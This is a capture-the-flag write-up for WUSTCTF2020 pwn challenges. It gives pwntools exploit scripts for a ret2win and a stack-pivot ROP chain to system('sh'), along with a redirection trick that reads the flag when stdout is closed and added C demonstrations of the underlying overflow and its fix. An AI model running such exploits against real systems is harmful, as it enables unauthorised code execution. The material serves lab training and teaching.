
WUSTCTF2020 reproduction

While farming some points on BUU today I ran into these challenges, so I took the chance to reproduce the WUSTCTF ones.

getshell

A simple ret2win.
exp:

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

# p = process('./wustctf2020_getshell')
p = remote('node3.buuoj.cn', 25756)
elf = ELF('./wustctf2020_getshell')
backdoor = 0x804851b  # backdoor function that hands out a shell

p.recv()
# 0x1c bytes of filler reach the saved return address, which is replaced by the backdoor
payload = b'a' * 0x1c + p32(backdoor)
p.sendline(payload)
p.interactive()

closed

The challenge hands you a shell directly, but both stderr and stdout are closed, so output has to be redirected to the stdin descriptor.
Once connected with nc, simply run:

cat flag >&0
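Why `>&0` works, as an added demonstration that is not part of the original writeup: the descriptor nc hands the process is a connected socket, and a socket is full-duplex no matter which fd number it sits on. Closing fds 1 and 2 in the challenge process therefore does not stop data from leaving through fd 0. The child below stands in for the challenge process (socket on fd 0, fds 1 and 2 closed), the parent plays the remote client, and the message is a constructed sample, not a real flag. The defender's takeaway is that closing stdout and stderr is not an output control; the only real control is not to hand out the shell.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/wait.h>

/* Returns 1 if bytes written to fd 0 by a process whose fds 1 and 2 are
 * closed still reach the peer on the other end of the socket, 0 otherwise. */
int output_survives_closed_stdout(void)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return 0;

    pid_t pid = fork();
    if (pid < 0)
        return 0;

    if (pid == 0) {
        /* child: the socket becomes fd 0, fds 1 and 2 are closed as in the challenge */
        close(sv[0]);
        dup2(sv[1], 0);
        close(sv[1]);
        close(1);
        close(2);
        /* constructed sample message, not a real flag */
        const char msg[] = "flag{constructed-sample}\n";
        /* what `cat flag >&0` boils down to: a write() on fd 0 */
        if (write(0, msg, sizeof(msg) - 1) < 0)
            _exit(1);
        _exit(0);
    }

    /* parent: the remote client reading what comes back over the socket */
    close(sv[1]);
    char buf[64] = {0};
    ssize_t n = read(sv[0], buf, sizeof(buf) - 1);
    close(sv[0]);
    waitpid(pid, NULL, 0);
    return n > 0 && strcmp(buf, "flag{constructed-sample}\n") == 0;
}

int main(void)
{
    printf("bytes written to fd 0 reached the peer: %s\n",
           output_survives_closed_stdout() ? "yes" : "no");
    return 0;
}
```

The child never touches fd 1 or 2 after closing them; the data path is the socket itself, which is exactly what the shell redirection `>&0` (dup2(0, 1) performed by the shell before exec) relies on.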

getshell_2

Stack pivoting: reuse the existing read function together with a bss address. Since the binary has no other usable strings, system('sh') can be used to get a shell.
exp:

from pwn import *

context.log_level = 'debug'
context.arch = 'i386'

p = process('./wustctf2020_getshell_2')
# p = remote('node3.buuoj.cn', 25756)
elf = ELF('./wustctf2020_getshell_2')
backdoor = 0x804851b

sh_addr = 0x8048670        # "sh" string
read_addr = 0x804858B      # re-enter the existing read() in the vulnerable function
read_addr_2 = 0x804858D
system_addr = 0x80483E0    # system
bss = 0x804a040 + 0x300    # writable bss area used as the fake stack
leave_ret = 0x08048488     # leave; ret gadget

p.recv()
# stage 1: saved ebp -> bss+0x18, return into read() so the next input lands at bss
payload = b'a' * 0x18 + p32(bss + 0x18) + p32(read_addr)
p.sendline(payload)
# stage 2: the fake frame at bss; leave_ret pivots esp there and returns into system("sh")
payload = b'aaaa' + p32(system_addr) + p32(0) + p32(sh_addr) + p32(0) * 2 + p32(bss) + p32(leave_ret)
# here to fill 0x18 size: 0x18 bytes of padding are needed before p32(bss)
p.sendline(payload)
p.interactive()
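Both challenges share one root cause: a read() whose length comes from the caller's request rather than from the size of the stack buffer, so the bytes past the buffer land on the saved ebp and the return address (which is where the 0x1c and 0x18 offsets above come from). The block below is an added example, not code from the writeup or the challenge binaries; it assumes a 0x18-byte buffer, as the payloads imply, and feeds constructed input (0x20 'A' bytes) through a pipe. The unbounded read is shown beside a bounded replacement that clamps to the real capacity and NUL-terminates, and the writes stay inside the struct object so the demo itself is well-defined C.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_LEN 0x18   /* assumed: the 0x18-byte stack buffer implied by the payloads */

/* Stand-in for the vulnerable function's frame: the buffer, then the saved
 * ebp and return address that follow it on an i386 stack. sizeof(buf) +
 * sizeof(saved_ebp) == 0x1c, the filler length used in the getshell payload. */
struct frame {
    char buf[BUF_LEN];
    unsigned int saved_ebp;
    unsigned int ret_addr;
};

/* Vulnerable pattern: read() is handed a request size unrelated to the
 * buffer size, so anything past BUF_LEN overwrites saved_ebp and ret_addr. */
static ssize_t read_unbounded(int fd, char *dst, size_t request)
{
    return read(fd, dst, request);      /* BUG: no relation to the buffer size */
}

/* Hardened pattern: clamp to the real capacity and keep room for a terminator. */
static ssize_t read_bounded(int fd, char *dst, size_t cap, size_t request)
{
    if (cap == 0)
        return -1;
    size_t want = request < cap - 1 ? request : cap - 1;
    ssize_t n = read(fd, dst, want);
    if (n < 0)
        return -1;
    dst[n] = '\0';
    return n;
}

/* Constructed input: 0x20 filler bytes, enough to run through buf, saved_ebp
 * and ret_addr, placed in a pipe so the reads see it as user input. */
static int feed_input(int *rfd)
{
    int pfd[2];
    if (pipe(pfd) != 0)
        return -1;
    char input[sizeof(struct frame)];
    memset(input, 'A', sizeof input);
    if (write(pfd[1], input, sizeof input) != (ssize_t)sizeof input)
        return -1;
    close(pfd[1]);
    *rfd = pfd[0];
    return 0;
}

/* ret_addr after the unbounded read: 0x41414141 means the return address is
 * now attacker-supplied data. */
unsigned int ret_addr_after_unbounded_read(void)
{
    struct frame f = { {0}, 0xbbbbbbbbu, 0xdeadbeefu };
    int fd;
    if (feed_input(&fd) != 0)
        return 0;
    read_unbounded(fd, (char *)&f, sizeof f);   /* request > BUF_LEN */
    close(fd);
    return f.ret_addr;
}

/* Bytes accepted by the bounded read (0x17, leaving room for the NUL); the
 * ret_addr slot is reported through *ret_after and must still be 0xdeadbeef. */
ssize_t bytes_accepted_by_bounded_read(unsigned int *ret_after)
{
    struct frame f = { {0}, 0xbbbbbbbbu, 0xdeadbeefu };
    int fd;
    if (feed_input(&fd) != 0)
        return -1;
    ssize_t n = read_bounded(fd, f.buf, sizeof f.buf, sizeof f);
    close(fd);
    *ret_after = f.ret_addr;
    return n;
}

int main(void)
{
    unsigned int ret = 0;
    printf("unbounded read: ret_addr = 0x%08x\n", ret_addr_after_unbounded_read());
    ssize_t n = bytes_accepted_by_bounded_read(&ret);
    printf("bounded read: accepted %zd bytes, ret_addr = 0x%08x\n", n, ret);
    return 0;
}
```

The same clamping applies to any input primitive (gets, scanf("%s"), recv with a caller-chosen length); the fix is always to tie the length to the destination's size, and stack canaries or PIE only raise the cost of exploitation rather than remove the bug.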
I'm so hungry. If I'd known, I wouldn't have studied security.